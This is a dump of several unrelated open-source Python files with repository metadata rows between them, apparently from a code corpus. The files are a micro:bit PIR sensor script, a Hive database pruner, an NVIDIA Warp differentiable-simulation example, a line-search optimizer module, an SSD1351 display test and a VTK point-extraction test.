if self.__pin.read_digital():
return True
else:
return False
if __name__ == '__main__':
sensor = PIR(J1)
while True:
if sensor.PIR_is_decection():
display.show(Image.HAPPY)
else:
display.show(Image.SAD)
| 17.978723 | 42 | 0.504142 | 94 | 845 | 4.180851 | 0.531915 | 0.076336 | 0.068702 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.023622 | 0.398817 | 845 | 46 | 43 | 18.369565 | 0.75 | 0.128994 | 0 | 0.083333 | 0 | 0 | 0.011887 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.083333 | false | 0 | 0.083333 | 0 | 0.291667 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
5bbe9f7c8be6cfdb5c273cc5d3e55754436428fd | 390 | py | Python | hive_gns/engine/pruner.py | imwatsi/hive-gns | c2b29b19245381af8ad0c055c0f0c14f331d5c10 | [
"MIT"
] | null | null | null | hive_gns/engine/pruner.py | imwatsi/hive-gns | c2b29b19245381af8ad0c055c0f0c14f331d5c10 | [
"MIT"
] | null | null | null | hive_gns/engine/pruner.py | imwatsi/hive-gns | c2b29b19245381af8ad0c055c0f0c14f331d5c10 | [
"MIT"
] | null | null | null | import time
from hive_gns.database.access import delete
class Pruner:
@classmethod
def delete_old_ops(cls):
sql = f"""
DELETE FROM gns.ops
WHERE created <= NOW() - INTERVAL '30 DAYS';
"""
return delete(sql)
@classmethod
def run_pruner(cls):
while True:
cls.delete_old_ops()
time.sleep(300)
| 19.5 | 56 | 0.561538 | 46 | 390 | 4.630435 | 0.630435 | 0.131455 | 0.112676 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.019608 | 0.346154 | 390 | 19 | 57 | 20.526316 | 0.815686 | 0 | 0 | 0.133333 | 0 | 0 | 0.251282 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.133333 | false | 0 | 0.133333 | 0 | 0.4 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
5bc01949d492a259d48585f6c5cb445301f6248e | 7,604 | py | Python | examples/example_sim_grad_bounce.py | NVIDIA/warp | fc7d3255435fc2fe6b54300e689f74e6d67418ca | [
"CNRI-Python-GPL-Compatible",
"Unlicense",
"0BSD",
"Apache-2.0",
"MIT"
] | 306 | 2022-03-21T23:24:13.000Z | 2022-03-31T21:11:28.000Z | examples/example_sim_grad_bounce.py | NVIDIA/warp | fc7d3255435fc2fe6b54300e689f74e6d67418ca | [
"CNRI-Python-GPL-Compatible",
"Unlicense",
"0BSD",
"Apache-2.0",
"MIT"
] | 11 | 2022-03-23T06:23:25.000Z | 2022-03-31T22:17:18.000Z | examples/example_sim_grad_bounce.py | NVIDIA/warp | fc7d3255435fc2fe6b54300e689f74e6d67418ca | [
"CNRI-Python-GPL-Compatible",
"Unlicense",
"0BSD",
"Apache-2.0",
"MIT"
] | 18 | 2022-03-22T16:27:21.000Z | 2022-03-30T20:07:47.000Z | # Copyright (c) 2022 NVIDIA CORPORATION. All rights reserved.
# NVIDIA CORPORATION and its licensors retain all intellectual property
# and proprietary rights in and to this software, related documentation
# and any modifications thereto. Any use, reproduction, disclosure or
# distribution of this software and related documentation without an express
# license agreement from NVIDIA CORPORATION is strictly prohibited.
###########################################################################
# Example Sim Grad Bounce
#
# Shows how to use Warp to optimize the initial velocity of a particle
# such that it bounces off the wall and floor in order to hit a target.
#
# This example uses the built-in wp.Tape() object to compute gradients of
# the distance to target (loss) w.r.t the initial velocity, followed by
# a simple gradient-descent optimization step.
#
###########################################################################
import os
import numpy as np
import warp as wp
import warp.sim
import warp.sim.render
wp.init()
class Bounce:
# seconds
sim_duration = 0.6
# control frequency
frame_dt = 1.0/60.0
frame_steps = int(sim_duration/frame_dt)
# sim frequency
sim_substeps = 8
sim_steps = frame_steps * sim_substeps
sim_dt = frame_dt / sim_substeps
sim_time = 0.0
render_time = 0.0
train_iters = 250
train_rate = 0.01
def __init__(self, render=True, profile=False, adapter='cpu'):
builder = wp.sim.ModelBuilder()
builder.add_particle(pos=(-0.5, 1.0, 0.0), vel=(5.0, -5.0, 0.0), mass=1.0)
builder.add_shape_box(body=-1, pos=(2.0, 1.0, 0.0), hx=0.25, hy=1.0, hz=1.0)
self.device = adapter
self.profile = profile
self.model = builder.finalize(adapter)
self.model.ground = True
self.model.soft_contact_ke = 1.e+4
self.model.soft_contact_kf = 0.0
self.model.soft_contact_kd = 1.e+1
self.model.soft_contact_mu = 0.25
self.model.soft_contact_margin = 10.0
self.integrator = wp.sim.SemiImplicitIntegrator()
self.target = (-2.0, 1.5, 0.0)
self.loss = wp.zeros(1, dtype=wp.float32, device=adapter, requires_grad=True)
# allocate sim states for trajectory
self.states = []
for i in range(self.sim_steps+1):
self.states.append(self.model.state(requires_grad=True))
# one-shot contact creation (valid if we're doing simple collision against a constant normal plane)
wp.sim.collide(self.model, self.states[0])
if (self.render):
self.stage = wp.sim.render.SimRenderer(self.model, os.path.join(os.path.dirname(__file__), "outputs/example_sim_grad_bounce.usd"))
@wp.kernel
def loss_kernel(pos: wp.array(dtype=wp.vec3),
target: wp.vec3,
loss: wp.array(dtype=float)):
# distance to target
delta = pos[0]-target
loss[0] = wp.dot(delta, delta)
@wp.kernel
def step_kernel(x: wp.array(dtype=wp.vec3),
grad: wp.array(dtype=wp.vec3),
alpha: float):
tid = wp.tid()
# gradient descent step
x[tid] = x[tid] - grad[tid]*alpha
def compute_loss(self):
# run control loop
for i in range(self.sim_steps):
self.states[i].clear_forces()
self.integrator.simulate(self.model,
self.states[i],
self.states[i+1],
self.sim_dt)
# compute loss on final state
wp.launch(self.loss_kernel, dim=1, inputs=[self.states[-1].particle_q, self.target, self.loss], device=self.device)
return self.loss
def render(self, iter):
# render every 16 iters
if iter % 16 > 0:
return
# draw trajectory
traj_verts = [self.states[0].particle_q.numpy()[0].tolist()]
for i in range(0, self.sim_steps, self.sim_substeps):
traj_verts.append(self.states[i].particle_q.numpy()[0].tolist())
self.stage.begin_frame(self.render_time)
self.stage.render(self.states[i])
self.stage.render_box(pos=self.target, rot=wp.quat_identity(), extents=(0.1, 0.1, 0.1), name="target")
self.stage.render_line_strip(vertices=traj_verts, color=wp.render.bourke_color_map(0.0, 7.0, self.loss.numpy()[0]), radius=0.02, name=f"traj_{iter}")
self.stage.end_frame()
self.render_time += self.frame_dt
self.stage.save()
def check_grad(self):
param = self.states[0].particle_qd
# initial value
x_c = param.numpy().flatten()
# compute numeric gradient
x_grad_numeric = np.zeros_like(x_c)
for i in range(len(x_c)):
eps = 1.e-3
step = np.zeros_like(x_c)
step[i] = eps
x_1 = x_c + step
x_0 = x_c - step
param.assign(x_1)
l_1 = self.compute_loss().numpy()[0]
param.assign(x_0)
l_0 = self.compute_loss().numpy()[0]
dldx = (l_1-l_0)/(eps*2.0)
x_grad_numeric[i] = dldx
# reset initial state
param.assign(x_c)
# compute analytic gradient
tape = wp.Tape()
with tape:
l = self.compute_loss()
tape.backward(l)
x_grad_analytic = tape.gradients[param]
print(f"numeric grad: {x_grad_numeric}")
print(f"analytic grad: {x_grad_analytic}")
tape.zero()
def train(self):
for i in range(self.train_iters):
tape = wp.Tape()
with wp.ScopedTimer("Forward", active=self.profile):
with tape:
self.compute_loss()
with wp.ScopedTimer("Backward", active=self.profile):
tape.backward(self.loss)
with wp.ScopedTimer("Render", active=self.profile):
self.render(i)
with wp.ScopedTimer("Step", active=self.profile):
x = self.states[0].particle_qd
x_grad = tape.gradients[self.states[0].particle_qd]
print(f"Iter: {i} Loss: {self.loss}")
print(f" x: {x} g: {x_grad}")
wp.launch(self.step_kernel, dim=len(x), inputs=[x, x_grad, self.train_rate], device=self.device)
tape.zero()
def train_graph(self):
# capture forward/backward passes
wp.capture_begin()
tape = wp.Tape()
with tape:
self.compute_loss()
tape.backward(self.loss)
self.graph = wp.capture_end()
# replay and optimize
for i in range(self.train_iters):
with wp.ScopedTimer("Step", active=self.profile):
# forward + backward
wp.capture_launch(self.graph)
# gradient descent step
x = self.states[0].particle_qd
wp.launch(self.step_kernel, dim=len(x), inputs=[x, x.grad, self.train_rate], device=self.device)
print(f"Iter: {i} Loss: {self.loss}")
print(tape.gradients[self.states[0].particle_qd])
# clear grads for next iteration
tape.zero()
with wp.ScopedTimer("Render", active=self.profile):
self.render(i)
bounce = Bounce(adapter=wp.get_preferred_device(), profile=False, render=True)
bounce.check_grad()
bounce.train_graph()
| 28.912548 | 161 | 0.574303 | 1,011 | 7,604 | 4.195846 | 0.256182 | 0.035361 | 0.018152 | 0.015559 | 0.218293 | 0.137199 | 0.126827 | 0.07025 | 0.057049 | 0.057049 | 0 | 0.023117 | 0.294582 | 7,604 | 263 | 162 | 28.912548 | 0.767711 | 0.166491 | 0 | 0.2 | 0 | 0 | 0.036893 | 0.005688 | 0 | 0 | 0 | 0 | 0 | 1 | 0.059259 | false | 0 | 0.037037 | 0 | 0.192593 | 0.044444 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
5bc51f065eb8ca85aa842d7f3d633a1dccfbb3b5 | 18,655 | py | Python | learning/optimize/linesearch.py | JustinLovinger/learning | 895b5d91509f1bf3da64f804dc346aecbfec853c | [
"MIT"
] | 6 | 2017-09-15T20:54:14.000Z | 2021-05-07T21:32:43.000Z | learning/optimize/linesearch.py | JustinLovinger/learning | 895b5d91509f1bf3da64f804dc346aecbfec853c | [
"MIT"
] | null | null | null | learning/optimize/linesearch.py | JustinLovinger/learning | 895b5d91509f1bf3da64f804dc346aecbfec853c | [
"MIT"
] | 5 | 2017-09-20T17:39:41.000Z | 2020-05-03T23:24:43.000Z | ###############################################################################
# The MIT License (MIT)
#
# Copyright (c) 2017 Justin Lovinger
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
###############################################################################
"""Strategies for determining step size during an optimization iteration."""
import logging
import itertools
import numpy
from learning.optimize import IncrPrevStep, QuadraticInitialStep
#########################
# Base Model
#########################
class StepSizeGetter(object):
"""Returns step size when called.
Used by Optimizer.
"""
def reset(self):
"""Reset parameters."""
pass
def __call__(self, xk, obj_xk, jac_xk, step_dir, problem):
"""Return step size.
xk: x_k; Parameter values at current step.
obj_xk: f(x_k); Objective value at x_k.
jac_xk: grad_f(x_k); First derivative (jacobian) at x_k.
step_dir: p_k; Step direction (ex. jacobian in steepest descent) at x_k.
problem: Problem; Problem instance passed to Optimizer
"""
raise NotImplementedError()
###############################
# StepSizeGetter implementations
###############################
class SetStepSize(StepSizeGetter):
"""Return a given step size every call.
Simple and efficient. Not always effective.
"""
def __init__(self, step_size):
super(SetStepSize, self).__init__()
self._step_size = step_size
def __call__(self, xk, obj_xk, jac_xk, step_dir, problem):
"""Return step size.
xk: x_k; Parameter values at current step.
obj_xk: f(x_k); Objective value at x_k.
jac_xk: grad_f(x_k); First derivative (jacobian) at x_k.
step_dir: p_k; Step direction (ex. jacobian in steepest descent) at x_k.
problem: Problem; Problem instance passed to Optimizer
"""
return self._step_size
class BacktrackingLineSearch(StepSizeGetter):
"""Return step size found with backtracking line search."""
def __init__(self, c_1=0.5, decr_rate=0.5, initial_step_getter=None):
super(BacktrackingLineSearch, self).__init__()
self._c_1 = c_1
self._decr_rate = decr_rate
if initial_step_getter is None:
# Slightly more than 1 step up
initial_step_getter = IncrPrevStep(
incr_rate=2.0 / self._decr_rate - 1.0,
lower_bound=0.0,
upper_bound=None)
self._initial_step_getter = initial_step_getter
def reset(self):
"""Reset parameters."""
super(BacktrackingLineSearch, self).reset()
self._initial_step_getter.reset()
def __call__(self, xk, obj_xk, jac_xk, step_dir, problem):
"""Return step size.
xk: x_k; Parameter values at current step.
obj_xk: f(x_k); Objective value at x_k.
jac_xk: grad_f(x_k); First derivative (jacobian) at x_k.
step_dir: p_k; Step direction (ex. jacobian in steepest descent) at x_k.
problem: Problem; Problem instance passed to Optimizer
"""
initial_step = self._initial_step_getter(xk, obj_xk, jac_xk, step_dir,
problem)
step_size = _backtracking_line_search(
xk,
obj_xk,
jac_xk,
step_dir,
problem.get_obj,
self._c_1,
initial_step,
decr_rate=self._decr_rate)
self._initial_step_getter.update(step_size)
return step_size
class WolfeLineSearch(StepSizeGetter):
"""Specialized algorithm for finding step size that satisfies strong wolfe conditions."""
def __init__(self, c_1=1e-4, c_2=0.9, initial_step_getter=None):
super(WolfeLineSearch, self).__init__()
# "In practice, c_1 is chosen to be quite small, say c_1 = 10^-4"
# ~Numerical Optimization (2nd) pp. 33
self._c_1 = c_1
# "Typical values of c_2 are 0.9 when the search direction p_k
# is chosen by a Newton or quasi-Newton method,
# and 0.1 when pk is obtained from a nonlinear conjugate gradient method."
# ~Numerical Optimization (2nd) pp. 34
self._c_2 = c_2
if initial_step_getter is None:
initial_step_getter = QuadraticInitialStep()
self._initial_step_getter = initial_step_getter
def reset(self):
"""Reset parameters."""
super(WolfeLineSearch, self).reset()
self._initial_step_getter.reset()
def __call__(self, xk, obj_xk, jac_xk, step_dir, problem):
"""Return step size.
xk: x_k; Parameter values at current step.
obj_xk: f(x_k); Objective value at x_k.
jac_xk: grad_f(x_k); First derivative (jacobian) at x_k.
step_dir: p_k; Step direction (ex. jacobian in steepest descent) at x_k.
problem: Problem; Problem instance passed to Optimizer
"""
initial_step = self._initial_step_getter(xk, obj_xk, jac_xk, step_dir,
problem)
step_size = _line_search_wolfe(xk, obj_xk, jac_xk, step_dir,
problem.get_obj_jac, self._c_1,
self._c_2, initial_step)
self._initial_step_getter.update(step_size)
return step_size
def _backtracking_line_search(parameters,
obj_xk,
jac_xk,
step_dir,
obj_func,
c_1,
initial_step,
decr_rate=0.9):
"""Return step size that satisfies the armijo rule.
Discover step size by decreasing step size in small increments.
args:
parameters: x_k; Parameter values at current step.
obj_xk: f(x_k); Objective value at x_k.
jac_xk: grad_f(x_k); First derivative (jacobian) at x_k.
step_dir: p_k; Step direction (ex. jacobian in steepest descent) at x_k.
obj_func: Function taking parameters and returning obj value at given parameters.
c_1: Strictness parameter for Armijo rule.
"""
if numpy.isnan(obj_xk):
# Failsafe because _armijo_rule will never return True
logging.warning(
'nan objective value in _backtracking_line_search, defaulting to 1e-25 step size'
)
return 1e-25
step_size = initial_step
for i in itertools.count(start=1):
if step_size < 1e-25:
# Failsafe for numerical precision errors preventing _armijo_rule returning True
# This can happen if gradient provides very little improvement
# (or is in the wrong direction)
logging.info(
'_backtracking_line_search failed Armijo with step_size ~= 1e-25, returning'
)
return step_size
obj_xk_plus_ap = obj_func(parameters + step_size * step_dir)
if _armijo_rule(step_size, obj_xk, jac_xk, step_dir, obj_xk_plus_ap,
c_1):
assert step_size > 0
return step_size
# Did not satisfy, decrease step size and try again
step_size *= decr_rate
WOLFE_INCR_RATE = 1.5
def _line_search_wolfe(parameters, obj_xk, jac_xk, step_dir, obj_jac_func, c_1,
c_2, initial_step):
"""Return step size that satisfies wolfe conditions.
See Numerical Optimization (2nd) pp. 60
This procedure first finds an interval containing an
acceptable step length (or just happens upon such a length),
then calls the zoom procedure to fine tune that interval
until an acceptable step length is discovered.
args:
parameters: x_k; Parameter values at current step.
obj_xk: f(x_k); Objective value at x_k.
jac_xk: grad_f(x_k); First derivative (jacobian) at x_k.
step_dir: p_k; Step direction (ex. jacobian in steepest descent) at x_k.
obj_jac_func: Function taking parameters and returning obj and jac at given parameters.
c_1: Strictness parameter for Armijo rule.
c_2: Strictness parameter for curvature condition.
"""
if numpy.isnan(obj_xk):
# Failsafe for erroneously calculated obj_xk (usually overflow or x/0)
# TODO: Might need similar failsafe for nan in jac_xk or step_dir
logging.warning(
'nan objective value in _line_search_wolfe, defaulting to 1e-10 step size'
)
return 1e-10
step_zero_obj = obj_xk
step_zero_grad = jac_xk.dot(step_dir)
# We need the current and previous step size for some operations
prev_step_size = 0.0
prev_step_obj = step_zero_obj
step_size = initial_step
for i in itertools.count(start=1):
if i >= 100:
# Failsafe for numerical precision errors preventing convergence
# This can happen if gradient provides very little improvement
# (or is in the wrong direction)
logging.info('Wolfe line search aborting after 100 iterations')
return step_size
# Evaluate objective and jacobian for most recent step size
step_obj, step_grad = _step_size_obj_jac_func(step_size, parameters,
step_dir, obj_jac_func)
# True if objective did not improve (step_obj >= prev_step_obj), after first iterations,
# or armijo condition is False (step_obj > obj_xk + c_1*step_size*step_grad)
if ((i > 1 and step_obj >= prev_step_obj)
or (step_obj > obj_xk + c_1 * step_size * step_grad)):
return _zoom_wolfe(prev_step_size, prev_step_obj, step_size,
parameters, obj_xk, step_zero_grad, step_dir,
obj_jac_func, c_1, c_2)
# Check if step size is already an acceptable step length
# True when gradient is sufficiently small (magnitude wise)
elif numpy.abs(step_grad) <= -c_2 * step_zero_grad:
return step_size
# If objective value did not improve (first if statement)
# and step size needs to increase (non-negative gradient)
elif step_grad >= 0:
return _zoom_wolfe(step_size, step_obj, prev_step_size, parameters,
obj_xk, step_zero_grad, step_dir, obj_jac_func,
c_1, c_2)
# Increase step size, score current values for comparison to previous
prev_step_size = step_size
prev_step_obj = step_obj
prev_step_grad = step_grad
# Similar to zoom, we need to find a new trial step size
# somewhere between current, and an arbitrary max
# alpha_i < alpha_{i+1} < max
# "The last step of the algorithm performs extrapolation to find
# the next trial value alpha_{i+1}.
# To implement this step we can use approaches like the interpolation
# procedures above, or we can simply set alpha_{i+1} to some constant
# multiple of alpha_i.
# Whichever strategy we use,
# it is important that the successive steps increase quickly enough to
# reach the upper limit alpha_max in a finite number of iterations."
# ~Numerical Optimization (2nd) pp. 61
# Use multiply by constant strategy
# TODO: Try other interpolation strategies
step_size *= WOLFE_INCR_RATE
def _zoom_wolfe(step_size_low, step_size_low_obj, step_size_high, parameters,
step_zero_obj, step_zero_grad, step_dir, obj_jac_func, c_1,
c_2):
"""Zoom into acceptable step size within a given interval.
Args:
step_size_low: Step size with low objective value (good)
step_size_high: Step size with high objective value (high)
"""
# NOTE: lower objective values are better
# (hence step_size_low better than step_size_high)
# TODO: Optimize by caching values repeatedly used in inequalities
for i in itertools.count(start=1):
# Choose step size
# NOTE: step_size should not be too close to low or high
# TODO: Test other strategies (see Interpolation subsection of NumOpt)
# "Interpolate (using quadratic, cubic, or bisection)
# to find a trial step length alpha_j between alpha_lo and alpha_hi"
# ~Numerical Optimization (2nd) pp. 61
# Use bisection
step_size = _bisect_value(
min(step_size_low, step_size_high),
max(step_size_low, step_size_high))
assert step_size >= 0
if i >= 100:
# Failsafe for numerical precision errors preventing convergence
# This can happen if gradient provides very little improvement
# (or is in the wrong direction)
logging.info(
'Wolfe line search (zoom) aborting after 100 iterations')
return step_size
step_obj, step_grad = _step_size_obj_jac_func(step_size, parameters,
step_dir, obj_jac_func)
# If this step is worse, than the projection from initial parameters
# (a.k.a. Armijo condition if False)
# or this step is worse than the current high (bad) step size
if (step_obj > step_zero_obj + c_1 * step_size * step_zero_grad
or step_obj >= step_size_low_obj):
# step_size is not an improvement
# This step size is the new poor valued side of the interval
step_size_high = step_size
# step_size is an improvement
else:
# If this step size caused an improvement
# (first if statement is false),
# and step size gradient is sufficiently small (magnitude wise)
if numpy.abs(step_grad) <= -c_2 * step_zero_grad:
return step_size
# If good step size is larger than bad step size,
# and gradient is positive,
# or vice versa
if step_grad * (step_size_high - step_size_low) >= 0:
# Set the current bad step size to the current good step size
# Because step_size is better (and will be set so in a couple lines)
step_size_high = step_size_low
# Set step_size_low
step_size_low = step_size
step_size_low_obj = step_obj
def _bisect_value(min_, max_):
"""Return value half way between min and max."""
return min_ + 0.5 * (max_ - min_)
def _step_size_obj_jac_func(step_size, parameters, step_dir, obj_jac_func):
"""Return objective value and gradient for step size."""
step_obj, jac_xk_plus_ap = obj_jac_func(parameters + step_size * step_dir)
# Derivative of step size objective function, is jacobian
# dot step direction
step_grad = jac_xk_plus_ap.dot(step_dir)
return step_obj, step_grad
def _wolfe_conditions(step_size, parameters, obj_xk, jac_xk, step_dir,
obj_xk_plus_ap, jac_xk_plus_ap, c_1, c_2):
"""Return True if Wolfe conditions (Armijo rule and curvature condition) are met.
args:
step_size: a; Proposed step size.
parameters: x_k; Parameter values at current step.
obj_xk: f(x_k); Objective value at x_k.
jac_xk: grad_f(x_k); First derivative (jacobian) at x_k.
step_dir: p_k; Step direction (ex. jacobian in steepest descent) at x_k.
obj_xk_plus_ap: f(x_k + a_k p_k); Objective value at x_k + a_k p_k
jac_xk_plus_ap: grad_f(x_k = a_k p_k); jacobian value at x_k + a_k p_k
c_1: Strictness parameter for Armijo rule.
c_2: Strictness parameter for curvature condition.
"""
if not (0 < c_1 < c_2 < 1):
raise ValueError('0 < c_1 < c_2 < 1')
wolfe = (_armijo_rule(step_size, obj_xk, jac_xk, step_dir, obj_xk_plus_ap,
c_1)
and _curvature_condition(jac_xk, step_dir, jac_xk_plus_ap, c_2))
assert isinstance(
wolfe,
(numpy.bool_,
bool)), '_wolfe_conditions should return bool, check parameters shape'
return wolfe
def _armijo_rule(step_size, obj_xk, jac_xk, step_dir, obj_xk_plus_ap, c_1):
"""Return True if Armijo rule is met.
Armijo rule:
f(x_k + a_k p_k) <= f(x_k) + c_1 a_k p_k^T grad_f(x_k)
Where all vectors all column matrices
args:
step_size: a; Proposed step size.
obj_xk: f(x_k); Objective value at x_k.
jac_xk: grad_f(x_k); First derivative (jacobian) at x_k.
step_dir: p_k; Step direction (ex. jacobian in steepest descent) at x_k.
obj_xk_plus_ap: f(x_k + a_k p_k); Objective value at x_k + a_k p_k
c_1: Strictness parameter for Armijo rule.
"""
# NOTE: x.dot(y) == col_matrix(x).T * col_matrix(y)
return obj_xk_plus_ap <= obj_xk + (c_1 * step_size) * (jac_xk.dot(step_dir))
def _curvature_condition(jac_xk, step_dir, jac_xk_plus_ap, c_2):
"""Return True if curvature condition is met.
Curvature condition:
grad_f(x_k + a_k p_k)^T p_k >= c_2 grad_f(x_k)^T p_k
Where all vectors all column matrices
args:
jac_xk: grad_f(x_k); First derivative (jacobian) at x_k.
step_dir: p_k; Step direction (ex. jacobian in steepest descent) at x_k.
jac_xk_plus_ap: grad_f(x_k = a_k p_k); jacobian value at x_k + a_k p_k
c_2: Strictness parameter for curvature condition.
"""
# NOTE: x.dot(y) == col_matrix(x).T * col_matrix(y)
return (jac_xk_plus_ap).dot(step_dir) >= c_2 * (jac_xk.dot(step_dir))
| 40.032189 | 96 | 0.633021 | 2,639 | 18,655 | 4.214096 | 0.15953 | 0.082007 | 0.01079 | 0.017265 | 0.510296 | 0.466595 | 0.399694 | 0.370201 | 0.357162 | 0.355274 | 0 | 0.010953 | 0.285446 | 18,655 | 465 | 97 | 40.11828 | 0.823331 | 0.498633 | 0 | 0.321429 | 0 | 0 | 0.047771 | 0.006046 | 0 | 0 | 0 | 0.004301 | 0.017857 | 1 | 0.107143 | false | 0.005952 | 0.02381 | 0 | 0.261905 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
5bc67afba8ed5dc9591c0f85d1fe2b5abb56dd2e | 546 | py | Python | drivers/ssd1351/test128_row.py | IhorNehrutsa/micropython-nano-gui | 4ef0e20da27ef7c0b5c34136dcb372200f0e5e66 | [
"MIT"
] | 198 | 2018-08-31T22:30:28.000Z | 2022-03-27T14:21:36.000Z | drivers/ssd1351/test128_row.py | IhorNehrutsa/micropython-nano-gui | 4ef0e20da27ef7c0b5c34136dcb372200f0e5e66 | [
"MIT"
] | 24 | 2018-10-01T23:44:25.000Z | 2022-01-08T09:05:14.000Z | drivers/ssd1351/test128_row.py | IhorNehrutsa/micropython-nano-gui | 4ef0e20da27ef7c0b5c34136dcb372200f0e5e66 | [
"MIT"
] | 44 | 2018-09-30T02:09:56.000Z | 2022-03-25T07:37:36.000Z | # test128_row.py Test for device driver on 96 row display
import machine
from ssd1351 import SSD1351 as SSD
# Initialise hardware
def setup():
pdc = machine.Pin('X1', machine.Pin.OUT_PP, value=0)
pcs = machine.Pin('X2', machine.Pin.OUT_PP, value=1)
prst = machine.Pin('X3', machine.Pin.OUT_PP, value=1)
spi = machine.SPI(1)
ssd = SSD(spi, pcs, pdc, prst) # Create a display instance
return ssd
ssd = setup()
ssd.fill(0)
ssd.line(0, 0, 127, 127, ssd.rgb(0, 255, 0))
ssd.rect(0, 0, 15, 15, ssd.rgb(255, 0, 0))
ssd.show()
| 28.736842 | 63 | 0.664835 | 98 | 546 | 3.663265 | 0.459184 | 0.167131 | 0.108635 | 0.125348 | 0.172702 | 0.116992 | 0 | 0 | 0 | 0 | 0 | 0.100897 | 0.18315 | 546 | 18 | 64 | 30.333333 | 0.704036 | 0.184982 | 0 | 0 | 0 | 0 | 0.013605 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.071429 | false | 0 | 0.142857 | 0 | 0.285714 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
5bca10654ae55fb2d3ea1b8dd68b0e38ebec9051 | 2,202 | py | Python | sw/3rd_party/VTK-7.1.0/Filters/Points/Testing/Python/TestExtractPoints.py | esean/stl_voro_fill | c569a4019ff80afbf85482c7193711ea85a7cafb | [
"MIT"
] | 4 | 2019-05-30T01:52:12.000Z | 2021-09-29T21:12:13.000Z | sw/3rd_party/VTK-7.1.0/Filters/Points/Testing/Python/TestExtractPoints.py | esean/stl_voro_fill | c569a4019ff80afbf85482c7193711ea85a7cafb | [
"MIT"
] | null | null | null | sw/3rd_party/VTK-7.1.0/Filters/Points/Testing/Python/TestExtractPoints.py | esean/stl_voro_fill | c569a4019ff80afbf85482c7193711ea85a7cafb | [
"MIT"
] | 2 | 2019-08-30T23:36:13.000Z | 2019-11-08T16:52:01.000Z | #!/usr/bin/env python
import vtk
from vtk.test import Testing
from vtk.util.misc import vtkGetDataRoot
VTK_DATA_ROOT = vtkGetDataRoot()
# Interpolate onto a volume
# Parameters for debugging
NPts = 1000000
math = vtk.vtkMath()
math.RandomSeed(31415)
# create pipeline
#
points = vtk.vtkBoundedPointSource()
points.SetNumberOfPoints(NPts)
points.ProduceRandomScalarsOn()
points.ProduceCellOutputOff()
points.Update()
# Create a sphere implicit function
sphere = vtk.vtkSphere()
sphere.SetCenter(0.9,0.1,0.1)
sphere.SetRadius(0.33)
# Extract points within sphere
extract = vtk.vtkExtractPoints()
extract.SetInputConnection(points.GetOutputPort())
extract.SetImplicitFunction(sphere)
# Time execution
timer = vtk.vtkTimerLog()
timer.StartTimer()
extract.Update()
timer.StopTimer()
time = timer.GetElapsedTime()
print("Time to remove points: {0}".format(time))
print(" Number removed: {0}".format(extract.GetNumberOfPointsRemoved()))
print(" Original number of points: {0}".format(NPts))
# First output are the non-outliers
extMapper = vtk.vtkPointGaussianMapper()
extMapper.SetInputConnection(extract.GetOutputPort())
extMapper.EmissiveOff()
extMapper.SetScaleFactor(0.0)
extActor = vtk.vtkActor()
extActor.SetMapper(extMapper)
# Create an outline
outline = vtk.vtkOutlineFilter()
outline.SetInputConnection(points.GetOutputPort())
outlineMapper = vtk.vtkPolyDataMapper()
outlineMapper.SetInputConnection(outline.GetOutputPort())
outlineActor = vtk.vtkActor()
outlineActor.SetMapper(outlineMapper)
# Create the RenderWindow, Renderer and both Actors
#
ren0 = vtk.vtkRenderer()
ren1 = vtk.vtkRenderer()
renWin = vtk.vtkRenderWindow()
renWin.AddRenderer(ren0)
iren = vtk.vtkRenderWindowInteractor()
iren.SetRenderWindow(renWin)
# Add the actors to the renderer, set the background and size
#
ren0.AddActor(extActor)
ren0.AddActor(outlineActor)
ren0.SetBackground(0.1, 0.2, 0.4)
renWin.SetSize(250,250)
cam = ren0.GetActiveCamera()
